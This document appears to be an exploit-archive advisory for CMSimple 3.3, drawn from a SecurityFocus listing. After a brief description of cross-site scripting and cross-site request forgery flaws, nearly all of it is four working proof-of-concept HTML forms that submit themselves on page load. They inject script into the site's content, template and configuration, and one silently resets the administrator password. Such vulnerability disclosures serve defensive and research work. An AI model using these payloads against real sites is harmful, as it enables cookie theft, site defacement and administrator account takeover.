CMSimple 3.3 - Cross-Site Scripting / Cross-Site Request Forgery

source: https://www.securityfocus.com/bid/42470/info

CMSimple is prone to multiple cross-site scripting vulnerabilities and a cross-site request-forgery vulnerability.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, disclose or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.

CMSimple 3.3 is vulnerable; other versions may also be affected.

<form action="http://www.example.com/" method="post" name="main" >
<input type="hidden" name="text" value='<html><head><title>The name of the site - Content</title><meta name="keywords" content="key"><meta name="description" content="description"><meta http-equiv="content-type" content="text/html;charset=UTF-8"><link rel="stylesheet" href="./templates/default/stylesheet.css" type="text/css"></head><body><H1>Welcome</H1><P>code and <script>alert(document.cookie)</script></P></body></html>' />
<input type="hidden" name="file" value="content" />
<input type="hidden" name="action" value="save" />
</form>
<script>
document.main.submit();
</script>



<form action="http://www.example.com/" method="post" name="main" >

<input type="hidden" name="text" value='php and html code of template<script>alert(document.cookie)</script>' />
<input type="hidden" name="file" value="template" />
<input type="hidden" name="action" value="save" />

</form>
<script>
document.main.submit();
</script>



<form action="http://www.example.com/" method="post" name="main" >

<input type="hidden" name="security_password" value="test" />
<input type="hidden" name="security_type" value="page" />
<input type="hidden" name="site_title" value='CMSimple site"><script>alert(document.cookie)</script>' />
<input type="hidden" name="site_template" value="default" />
<input type="hidden" name="language_default" value="ru" />
<input type="hidden" name="meta_keywords" value="CMSimple, Content Management System, php" />
<input type="hidden" name="meta_description" value="CMSimple is a content management system" />
<input type="hidden" name="backup_numberoffiles" value="5" />
<input type="hidden" name="images_maxsize" value="150000" />
<input type="hidden" name="downloads_maxsize" value="1000000" />
<input type="hidden" name="mailform_email=" value="" />
<input type="hidden" name="editor_height" value="(screen.availHeight)-400" />
<input type="hidden" name="editor_external" value="" />
<input type="hidden" name="menu_color" value="000000" />
<input type="hidden" name="menu_highlightcolor" value="808080" />
<input type="hidden" name="menu_levels" value="3" />
<input type="hidden" name="menu_levelcatch" value="10" />
<input type="hidden" name="menu_sdoc" value="" />
<input type="hidden" name="menu_legal" value="CMSimple Legal Notices" />
<input type="hidden" name="uri_seperator" value=":" />
<input type="hidden" name="uri_length" value="200" />
<input type="hidden" name="xhtml_endtags" value="" />
<input type="hidden" name="xhtml_amp" value="true" />
<input type="hidden" name="plugins_folder" value="" />
<input type="hidden" name="functions_file" value="functions.php" />
<input type="hidden" name="scripting_regexp" value="\#CMSimple (.*?)\#" />
<input type="hidden" name="form" value="array" />
<input type="hidden" name="file" value="config" />
<input type="hidden" name="action" value="save" />

</form>
<script>
document.main.submit();
</script>



<form action="http://www.example.com/" method="post" name="main" >

<input type="hidden" name="security_password" value="newpassword" />
<input type="hidden" name="security_type" value="page" />
<input type="hidden" name="site_title" value='CMSimple site' />
<input type="hidden" name="site_template" value="default" />
<input type="hidden" name="language_default" value="ru" />
<input type="hidden" name="meta_keywords" value="CMSimple, Content Management System, php" />
<input type="hidden" name="meta_description" value="CMSimple is a content management system" />
<input type="hidden" name="backup_numberoffiles" value="5" />
<input type="hidden" name="images_maxsize" value="150000" />
<input type="hidden" name="downloads_maxsize" value="1000000" />
<input type="hidden" name="mailform_email=" value="" />
<input type="hidden" name="editor_height" value="(screen.availHeight)-400" />
<input type="hidden" name="editor_external" value="" />
<input type="hidden" name="menu_color" value="000000" />
<input type="hidden" name="menu_highlightcolor" value="808080" />
<input type="hidden" name="menu_levels" value="3" />
<input type="hidden" name="menu_levelcatch" value="10" />
<input type="hidden" name="menu_sdoc" value="" />
<input type="hidden" name="menu_legal" value="CMSimple Legal Notices" />
<input type="hidden" name="uri_seperator" value=":" />
<input type="hidden" name="uri_length" value="200" />
<input type="hidden" name="xhtml_endtags" value="" />
<input type="hidden" name="xhtml_amp" value="true" />
<input type="hidden" name="plugins_folder" value="" />
<input type="hidden" name="functions_file" value="functions.php" />
<input type="hidden" name="scripting_regexp" value="\#CMSimple (.*?)\#" />
<input type="hidden" name="form" value="array" />
<input type="hidden" name="file" value="config" />
<input type="hidden" name="action" value="save" />

</form>
<script>
document.main.submit();
</script>